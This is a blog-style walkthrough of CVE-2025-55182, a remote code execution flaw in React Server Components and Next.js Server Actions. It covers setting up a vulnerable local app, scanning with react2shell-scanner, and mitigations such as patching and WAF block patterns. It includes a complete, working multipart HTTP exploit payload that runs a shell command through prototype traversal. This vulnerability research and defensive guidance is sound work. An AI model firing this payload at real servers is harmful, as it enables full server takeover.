A Technical Deep-Dive into CVE-2025-55182: React RCE PoC, react2shell-scanner Analysis, and Next.js Server Actions Exploitation

This guide covers the full CVE-2025-55182 React RCE attack chain: React RCE PoC testing, BurpSuite payload analysis, react2shell-scanner detection, React Flight vulnerabilities, Next.js Server Actions exploitation, and how to fix the issue.

A Technical Deep-Dive into CVE-2025-55182: React RCE PoC, react2shell-scanner Analysis, and Next.js Server Actions Exploitation

Introduction

This article provides a full technical walkthrough of the CVE-2025-55182 React RCE PoC, including:

  • How to set up an environment vulnerable to the React Server Components RCE
  • How to execute the RCE PoC (Proof of Concept) using BurpSuite
  • How to scan applications using Assetnote’s react2shell-scanner
  • How to fix and mitigate Next.js Server Actions RCE
  • Key insights from the original research and repositories (with attribution)

This guide emphasizes keywords relevant to PoC testing, exploit demonstration, and react2shell scanning, making it SEO-friendly for engineers researching React RCE vulnerability, Next.js RCE, or CVE-2025-55182 exploit methods.

1. Background on CVE-2025-55182 and the React RCE PoC

CVE-2025-55182 is a critical React Server Components Remote Code Execution vulnerability discovered inside the React Flight deserialization mechanism.
The vulnerability enables:

  • Arbitrary object revival
  • Prototype poisoning via Flight selectors
  • Forced invocation of malicious .then() handlers
  • Complete Remote Code Execution (RCE) on Next.js servers

Key References (Original Research)

Both repositories are essential for understanding the exploit chain, and they are cited here with respect to the authors.

2. Preparing a Demo Application for PoC Testing

To test the React RCE PoC, we intentionally create a vulnerable Next.js Server Actions environment.

npm create [email protected] vulnerable-app -y
cd vulnerable-app

Start the app:

npm run dev

Your application is now ready for CVE-2025-55182 PoC injection.

3. Running the React RCE PoC Using BurpSuite

This section focuses specifically on PoC testing, RCE exploitation, and manual payload injection

3.1 Capture the Server Action Request

Use BurpSuite to intercept the initial request.

3.2 Inject the CVE-2025-55182 PoC Payload

Below is the PoC payload derived from maple3142's React RCE PoC:

POST / HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Next-Action: x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 459

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"process.mainModule.require('child_process').execSync('xcalc');","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

Why this PoC works

  • $1:__proto__:thenprototype traversal
  • "constructor:constructor" → unsafe revival of JS constructor
  • _prefix → command injection via Flight chunk processing
  • "$@0" → resolves the crafted chunk for execution
  • Payload structure matches React Flight PoC exploitation

This is exactly the behavior detected by react2shell-scanner.

3.3 Validate RCE

calc run after exploit

4. Scanning with Assetnote’s react2shell-scanner

To automate detection of React RCE / CVE-2025-55182, use:

🔗 https://github.com/assetnote/react2shell-scanner

The scanner performs:

  • Prototype traversal detection
  • Flight deserialization anomaly testing
  • Next.js Server Actions PoC validation
  • Identification of RSC endpoints vulnerable to RCE

4.1 Installing react2shell-scanner

git clone https://github.com/assetnote/react2shell-scanner
cd react2shell-scanner
pip install -r requirements.txt

4.2 Running the react2shell scan

python3 scanner.py -u http://localhost:3000

Output from a vulnerable target:

5. How to Fix CVE-2025-55182 (React RCE Mitigation)

5.1 Upgrade React & Next.js to patched versions

npm install next@latest react@latest react-dom@latest

Ensure:

  • Node.js >= 20.9.0
  • Flight deserialization patches applied

Official repos (referenced respectfully):

Next.js: https://github.com/vercel/next.js

5.2 Restrict Server Actions External Packages

module.exports = {
  experimental: {
    serverActionsExternalPackages: []
  }
}

This directly mitigates PoC patterns from the React RCE exploit.

5.3 Add WAF Rules Against PoC Indicators

Block PoC signatures:

  • "__proto__"
  • "constructor:constructor"
  • "Next-Action"
  • "$@0"
  • "resolved_model"

5.4 Harden Node.js Runtime

  • Disable dangerous APIs
  • Run non-root
  • Sandbox (gVisor / Firecracker)
  • Monitor subprocess calls

5.5 Monitor Indicators of React RCE Exploitation

Look for:

  • Multipart anomalies
  • Unexpected Next-Action execution patterns
  • react2shell-like probing attempts
  • Suspicious prototype traversal strings

6. Conclusion

This article demonstrated:

  • A full React RCE PoC walkthrough
  • Manual exploitation using BurpSuite
  • Automated scanning using react2shell-scanner
  • Proper mitigation steps for CVE-2025-55182
  • Attribution to original researchers and repo authors